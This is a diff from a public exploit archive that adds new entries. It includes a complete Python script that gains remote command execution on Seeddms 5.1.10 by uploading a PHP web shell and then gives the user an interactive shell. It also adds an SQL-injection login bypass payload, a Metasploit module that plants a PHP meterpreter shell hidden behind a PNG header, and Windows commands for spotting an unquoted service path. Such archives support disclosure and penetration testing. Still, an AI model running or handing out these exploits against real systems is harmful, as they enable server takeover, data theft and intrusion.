DB: 2021-06-26

5 changes to exploits/shellcodes

SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path

Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)
Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)
Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)

exploits/php/webapps/50062.py

@@ -0,0 +1,272 @@
+# Exploit Title: Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) 
+# Date: 25/06/2021
+# Exploit Author: Bryan Leong <NobodyAtall>
+# Vendor Homepage: https://www.seeddms.org/index.php?id=2
+# Software Link: https://sourceforge.net/projects/seeddms/files/seeddms-5.0.11/
+# Version: Seeddms 5.1.10
+# Tested on: Windows 7 x64
+# CVE: CVE-2019-12744
+
+import requests
+import argparse
+import sys
+import random
+import string
+from bs4 import BeautifulSoup
+from requests_toolbelt import MultipartEncoder
+
+def sysArgument():
+    ap = argparse.ArgumentParser()
+
+    ap.add_argument("-u", "--username", required=True, help="login username")
+    ap.add_argument("-p", "--password", required=True, help="login password")
+    ap.add_argument("--url", required=True, help="target URL Path")
+
+    args = vars(ap.parse_args())
+
+    return args['username'], args['password'], args['url'] 
+
+def login(sessionObj, username, password, url):
+    loginPath = "/op/op.Login.php"    
+    url += loginPath
+
+    postData = {
+        'login': username,
+        'pwd': password,
+        'lang' : 'en_GB'
+    }
+    try:
+        rsl = sessionObj.post(url, data=postData)
+
+        if(rsl.status_code == 200):
+            if "Error signing in. User ID or password incorrect." in rsl.text:
+                print("[!] Incorrect Credential.")
+            else:
+                print("[*] Login Successful.") 
+                print("[*] Session Token: " + sessionObj.cookies.get_dict()['mydms_session'])
+                return sessionObj                
+                
+        else:
+            print("[!] Something went wrong.")    
+            print("Status Code: %d" % (rsl.status_code))
+            sys.exit(0)
+    except Exception as e:
+        print("[!] Something Went Wrong!")
+        print(e)
+        sys.exit(0)
+
+    return sessionObj
+
+def formTokenCapturing(sessionObj, url):
+    path = "/out/out.AddDocument.php?folderid=1&showtree=1"
+    url += path
+    formToken = ""
+
+    try:        
+        rsl = sessionObj.get(url)
+
+        if(rsl.status_code == 200):
+            print("[*] Captured Form Token.")
+
+            #extracting form token
+            soup = BeautifulSoup(rsl.text,'html.parser')
+            form1 = soup.findAll("form", {"id": "form1"})
+            
+            soup = BeautifulSoup(str(form1[0]),'html.parser')
+            formToken = soup.find("input", {"name": "formtoken"})            
+            print("[*] Form Token: " + formToken.attrs['value'])
+            
+            return sessionObj, formToken.attrs['value']
+        else:
+            print("[!] Something went wrong.")    
+            print("Status Code: %d" % (rsl.status_code))
+            sys.exit(0)
+
+    except Exception as e:
+        print("[!] Something Went Wrong!")
+        print(e)
+        sys.exit(0)
+
+    return sessionObj, formToken
+
+def uploadingPHP(sessionObj, url, formToken):
+    path = "/op/op.AddDocument.php"
+    url += path
+
+    #generating random name
+    letters = string.ascii_lowercase
+    rand_name = ''.join(random.choice(letters) for i in range(20))
+
+    #POST Data
+    payload = {
+        'formtoken' : formToken,
+        'folderid' : '1',
+        'showtree' : '1',
+        'name' : rand_name,
+        'comment' : '',
+        'keywords' : '',
+        'sequence' : '2',
+        'presetexpdate' : 'never',
+        'expdate' : '',
+        'ownerid' : '1',
+        'reqversion' : '1',
+        'userfile[]' : (
+            '%s.php' % (rand_name),           
+            open('phpCmdInjection.php', 'rb'), 
+            'application/x-httpd-php'
+            ),
+        'version_comment' : ''
+    }
+    
+    multiPartEncodedData = MultipartEncoder(payload)
+
+    try:                
+        rsl = sessionObj.post(url, data=multiPartEncodedData, headers={'Content-Type' : multiPartEncodedData.content_type})
+
+        if(rsl.status_code == 200):
+            print("[*] Command Injection PHP Code Uploaded.")
+            print("[*] Name in Document Content Shows: " + rand_name)
+
+            return sessionObj, rand_name
+        else:
+            print("[!] Something went wrong.")    
+            print("Status Code: %d" % (rsl.status_code))
+            sys.exit(0)
+
+
+    except Exception as e:
+        print("[!] Something Went Wrong!")
+        print(e)
+        sys.exit(0)
+
+    return sessionObj, rand_name
+
+def getDocID(sessionObj, url, docName):
+    path = "/out/out.ViewFolder.php?folderid=1"
+    url += path
+    
+    try:        
+        rsl = sessionObj.get(url)
+
+        if(rsl.status_code == 200):
+            #searching & extracting document id storing payload
+            soup = BeautifulSoup(rsl.text,'html.parser')
+            viewFolderTables = soup.findAll("table", {"id": "viewfolder-table"})
+            
+            soup = BeautifulSoup(str(viewFolderTables[0]),'html.parser')
+            rowsDoc = soup.findAll("tr", {"class": "table-row-document"})            
+
+            for i in range(len(rowsDoc)):
+                soup = BeautifulSoup(str(rowsDoc[i]),'html.parser')
+                tdExtracted = soup.findAll("td") 
+                
+                foundDocName = tdExtracted[1].contents[0].contents[0]
+
+                #when document name matched uploaded document name
+                if(foundDocName == docName):
+                    print("[*] Found Payload Document Name. Extracting Document ID...")
+                    tmp = tdExtracted[1].contents[0].attrs['href'].split('?')
+                    docID = tmp[1].replace("&showtree=1", "").replace('documentid=', '')
+
+                    print("[*] Document ID: " + docID)
+
+                    return sessionObj, docID
+
+            #after loops & still unable to find matched uploaded Document Name
+            print("[!] Unable to find document ID.")
+            sys.exit(0)
+            
+        else:
+            print("[!] Something went wrong.")    
+            print("Status Code: %d" % (rsl.status_code))
+            sys.exit(0)
+
+    except Exception as e:
+        print("[!] Something Went Wrong!")
+        print(e)
+        sys.exit(0)
+
+    return sessionObj
+
+def shell(sessionObj, url, docID):
+    #remove the directory /seeddms-5.1.x
+    splitUrl = url.split('/')
+    remLastDir = splitUrl[:-1]
+
+    url = ""
+    #recontruct url
+    for text in remLastDir:
+        url += text + "/"
+
+    #path storing uploaded php code
+    path = "/data/1048576/%s/1.php" % docID
+    url += path
+
+    #checking does the uploaded php exists?
+    rsl = sessionObj.get(url)
+
+    if(rsl.status_code == 200):
+        print("[*] PHP Script Exist!")
+        print("[*] Injecting some shell command.")
+
+        #1st test injecting whoami command
+        data = {
+            'cmd' : 'whoami'
+        }
+
+        rsl = sessionObj.post(url, data=data)
+
+        if(rsl.text != ""):
+            print("[*] There's response from the PHP script!")
+            print('[*] System Current User: ' + rsl.text.replace("<pre>", "").replace("</pre>", ""))
+            
+            print("[*] Spawning Shell. type .exit to exit the shell", end="\n\n")
+            #start shell iteration
+            while(True):
+                cmd = input("[Seeddms Shell]$ ")
+
+                if(cmd == ".exit"):
+                    print("[*] Exiting shell.")
+                    sys.exit(0)
+
+                data = {
+                    'cmd' : cmd
+                }
+
+                rsl = sessionObj.post(url, data=data)
+                print(rsl.text.replace("<pre>", "").replace("</pre>", ""))
+
+        else:
+            print("[!] No response from PHP script. Something went wrong.")
+            sys.exit(0)
+
+    else:
+        print("[!] PHP Script Not Found!!")
+        print(rsl.status_code)
+        sys.exit(0)
+
+
+
+
+def main():    
+    username, password, url = sysArgument()
+
+    sessionObj = requests.Session()    
+
+    #getting session token from logging in    
+    sessionObj = login(sessionObj, username, password, url)
+
+    #capturing form token for adding document
+    sessionObj, formToken = formTokenCapturing(sessionObj, url)
+
+    #uploading php code for system command injection
+    sessionObj, docName = uploadingPHP(sessionObj, url, formToken)
+
+    #getting document id
+    sessionObj, docID = getDocID(sessionObj, url, docName)
+    
+    #spawning shell to exec system Command
+    shell(sessionObj, url, docID)
+
+if __name__ == "__main__":
+    main()

exploits/php/webapps/50063.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)
+# Date: 24-06-2021
+# Exploit Author: Barış Yıldızoğlu
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip
+# Version: 1.0
+# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3
+
+Request:
+
+POST /client%20details/index.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 50
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1 /client%20details/index.php
+Cookie: PHPSESSID=86klv32pm6nvt60qtli6peonod
+Upgrade-Insecure-Requests: 1
+
+uemail={Payload Here}&password=&login=LOG+IN
+
+
+# Proof of Concept:
+          Payload: admin' or 1=1#

exploits/php/webapps/50064.rb

@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Lightweight facebook-styled blog authenticated remote code execution",
+      'Description'    => %q{
+        This module exploits the file upload vulnerability of Lightweight self-hosted facebook-styled PHP blog and allows remote code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Maide Ilkay Aydogdu <ilkay@prodaft.com>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://prodaft.com']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => [ ARCH_PHP],
+      'Targets'        =>
+        [
+          ['PHP payload',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Blog username', 'demo']),
+        OptString.new('PASSWORD', [true, 'Blog password', 'demo']),
+        OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/'])
+      ]
+    )
+  end
+
+
+
+  def login
+
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path),
+    )
+
+
+    cookie = res.get_cookies
+    token = res.body.split('":"')[1].split('"')[0]
+    # token = res.to_s.scan(/"[abcdef0-9]{10}"}/)[0].to_s.tr('"}', '')
+    print_status("Got CSRF token: #{token}")
+    print_status('Logging into the blog...')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'ajax.php'),
+      'headers' => {
+        'Csrf-Token' => token,
+      },
+      'cookie' => cookie,
+      'data'      => "action=login&nick=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}",
+    )
+
+    if res && res.code == 200
+      print_good("Successfully logged in with #{datastore['USERNAME']}")
+      json = res.get_json_document
+      if json.empty? && json['error']
+        print_error('Login failed!')
+        return nil, nil
+      end
+    else
+      print_error("Login failed! Status code #{res.code}")
+      return nil, nil
+    end
+
+    return cookie, token
+  end
+
+
+  def exploit
+    cookie, token = login
+    unless cookie || token
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed")
+    end
+
+    data = Rex::MIME::Message.new # jWPU1tZmoAZgooopowaNGjRq0KhBowaNGjRqEHYAALgBALdg7lyPAAAAAElFTkSuQmCC
+    png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4') # only the PNG header
+    data.add_part(png+payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"mia.php\"")
+    print_status('Uploading shell...')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path,'ajax.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'action' => 'upload_image'
+      },
+      'headers' => {
+        'Csrf-Token' => token,
+      },
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => data.to_s,
+    )
+
+    # print_status(res.to_s)
+    if res && res.code == 200
+      json = res.get_json_document
+      if json.empty? || !json['path']
+        fail_with(Failure::UnexpectedReply, 'Unexpected json response')
+      end
+
+      print_good("Shell uploaded as #{json['path']}")
+    else
+      print_error("Server responded with code #{res.code}")
+      print_error("Failed to upload shell")
+      return false
+    end
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, json['path'])}, 3
+    )
+    print_good("Payload successfully triggered !")
+  end
+end

exploits/windows/local/50047.txt

@@ -4,6 +4,7 @@
 # Version: Remote Mouse 3.008
 # Tested on: Windows 10 Pro Version 21H1
 # Reference: https://deathflash.ml/blog/remote-mouse-lpe
+# CVE: CVE-2021-35448
 
 Steps to reproduce:
 

exploits/windows/local/50061.txt

@@ -0,0 +1,27 @@
+# Exploit Title: SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 21-06-2021
+# Vendor Homepage:  https://brother.com/
+# Tested Version: 7.60
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+
+SAPSprint    SAPSprint   C:\Program Files\SAP\SAPSprint\sapsprint.exe   Auto
+
+C:\>sc qc SAPSprint
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SAPSprint
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE        : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME:  C:\Program Files\SAP\SAPSprint\sapsprint.exe
+        LOAD_ORDER_GROUP  :
+        TAG           : 0
+        DISPLAY_NAME     : SAPSprint
+        DEPENDENCIES       : Spooler
+        SERVICE_START_NAME: LocalSystem

files_exploits.csv

@@ -11352,6 +11352,7 @@ id,file,description,date,author,type,platform,port
 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows,
 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows,
 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows,
+50061,exploits/windows/local/50061.txt,"SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path",2021-06-25,"Brian Rodriguez",local,windows,
 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows,
 49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows,
 49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,
@@ -44135,6 +44136,7 @@ id,file,description,date,author,type,platform,port
 49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",2021-06-03,flast101,webapps,php,
 49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
 49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",2021-06-03,sirpedrotavares,webapps,hardware,
+50062,exploits/php/webapps/50062.py,"Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)",2021-06-25,"Bryan Leong",webapps,php,
 49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
 49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
 49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby,
@@ -44201,3 +44203,5 @@ id,file,description,date,author,type,platform,port
 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm,
 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware,
 50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware,
+50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
+50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,